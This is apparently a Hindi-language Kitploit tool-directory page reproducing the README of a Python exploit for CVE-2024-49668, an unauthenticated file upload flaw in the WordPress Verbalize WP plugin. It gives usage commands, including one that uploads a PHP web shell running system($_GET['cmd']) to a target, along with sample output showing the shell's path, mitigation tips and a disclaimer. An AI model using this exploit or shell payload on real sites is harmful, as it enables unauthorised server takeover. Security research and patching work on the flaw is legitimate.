Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-49668 — WordPress Verbalize WP plugin <= 1.0 - मनमानी फ़ाइल अपलोड भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-49668
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-49668

CVE-2024-49668

WordPress Verbalize WP plugin <= 1.0 - मनमानी फ़ाइल अपलोड भेद्यता

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2024-49668: WordPress Verbalize WP प्लगइन में मनमानी फ़ाइल अपलोड करने की कमज़ोरी

📋 अवलोकन

CVE-2024-49668 WordPress Verbalize WP प्लगइन के संस्करण 1.0 और उससे नीचे में एक गंभीर कमज़ोरी है। यह कमज़ोरी बिना प्रमाणीकरण के हमलावरों को वेब सर्वर में मनमानी फ़ाइलें, जिनमें वेब शेल भी शामिल हैं, अपलोड करने की अनुमति देती है। यह समस्या फ़ाइल अपलोड के दौरान अपर्याप्त इनपुट सत्यापन और फ़ाइल प्रकार प्रतिबंधों के कारण उत्पन्न होती है।

विवरण

  • प्रकाशित: 2024-10-23
  • अद्यतन: 2024-10-23
  • शीर्षक: WordPress Verbalize WP प्लगइन <= 1.0 - मनमानी फ़ाइल अपलोड कमज़ोरी
  • विवरण: खतरनाक प्रकार की फ़ाइल के असीमित अपलोड की कमज़ोरी। Admin Verbalize WP Upload a Web Shell to a Web Server. यह समस्या Verbalize WP को n/a से 1.0 तक प्रभावित करती है।
  • CWE: CWE-434: खतरनाक प्रकार की फ़ाइल का असीमित अपलोड
  • CVSS स्कोर: 10.0 (गंभीर)
  • वेक्टर स्ट्रिंग: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🛠️ शोषण स्क्रिप्ट

यह Python स्क्रिप्ट Verbalize WP प्लगइन का उपयोग करके लक्ष्य WordPress साइट पर एक शेल फ़ाइल अपलोड करने के लिए CVE-2024-49668 कमज़ोरी का शोषण करती है।

विशेषताएं

  • स्वचालित कमज़ोरी जाँच: स्क्रिप्ट readme.txt में प्लगइन संस्करण की जाँच करके लक्ष्य साइट की कमज़ोरी की पुष्टि करती है।
  • फ़ाइल अपलोड: लक्ष्य साइट पर एक PHP शेल फ़ाइल अपलोड करती है।
  • पथ निष्कर्षण: अपलोड की गई शेल फ़ाइल का पूरा पथ निकालता और प्रदर्शित करता है।

🧰 आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी

आवश्यक लाइब्रेरी को pip का उपयोग करके स्थापित करें:

root@kitploit:~
pip install requests

🚀 उपयोग

root@kitploit:~
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

WordPress साइट पर POST अनुरोध निष्पादित करें।

options:
  -h, --help         यह सहायता संदेश दिखाएँ और बाहर निकलें
  -u, --url URL      लक्ष्य URL
  -s, --shell SHELL  अपलोड करने के लिए शेल कोड

उदाहरण

डिफ़ॉल्ट रूप से, स्क्रिप्ट एक PHP शेल अपलोड करेगी जो phpinfo() निष्पादित करती है।

root@kitploit:~
python CVE-2024-49668.py -u http://target.com

आप अपलोड करने के लिए एक कस्टम PHP शेल कोड भी निर्दिष्ट कर सकते हैं:

root@kitploit:~
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"

📄 स्क्रिप्ट आउटपुट

root@kitploit:~
साइट कमज़ोर है। संस्करण 1.0 का शोषण किया जा रहा है। फ़ाइल अपलोड की जा रही है...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi

📚 अतिरिक्त जानकारी

कमज़ोरी का प्रभाव

CVE-2024-49668 कमज़ोरी हमलावरों को दुर्भावनापूर्ण फ़ाइलें अपलोड करके लक्ष्य सर्वर पर पूर्ण नियंत्रण प्राप्त करने में सक्षम बनाती है। इस कमज़ोरी का शोषण करने से डेटा उल्लंघन, अनधिकृत पहुँच, और वेबसाइट के संभावित विरूपण सहित गंभीर परिणाम हो सकते हैं।

शमन के लिए सर्वोत्तम अभ्यास

अपनी WordPress साइट को इस कमज़ोरी से बचाने के लिए, निम्नलिखित अनुशंसित है:

  • Verbalize WP प्लगइन को नवीनतम संस्करण में अपडेट करें जो इस समस्या का समाधान करता है।
  • फ़ाइल प्रकारों और आकारों को प्रतिबंधित करने के लिए मजबूत फ़ाइल अपलोड सत्यापन लागू करें।
  • किसी भी संदिग्ध गतिविधि के लिए नियमित रूप से अपने सर्वर लॉग की निगरानी करें।

कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। मालिक से स्पष्ट अनुमति के बिना वेबसाइटों के विरुद्ध इस उपकरण का अनधिकृत उपयोग अवैध है। लेखक इस उपकरण द्वारा किए गए किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।


2025-03-22 को Nxploited , Khaled alenazi द्वारा बनाया गया

टूल डाउनलोड करें